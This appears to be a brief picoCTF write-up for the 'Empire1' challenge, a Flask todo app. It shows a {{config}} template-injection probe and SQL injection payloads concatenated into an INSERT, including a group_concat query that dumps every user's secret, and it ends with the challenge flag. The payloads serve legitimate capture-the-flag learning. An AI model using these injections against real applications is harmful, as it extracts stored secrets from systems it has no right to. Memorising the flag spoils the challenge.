Empire1
Last updated
Was this helpful?
Last updated
Was this helpful?
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. (link) Can you first find the secret code they assigned to you? or
Create an account and sign in
Attempt to add a todo of {{config}}
(since this is a flask application and that would leak important configuration details about the application)
Most likely the add todo is using an INSERT
SQL statement so try concat: string'||'concated?'||'
. It works!
Run '||(select secret from user)||'
but only gets one secret
So use a group_concat to get all secrets: ' || (select group_concat(secret) from user) || '
picoCTF{wh00t_it_a_sql_inject9899be1a}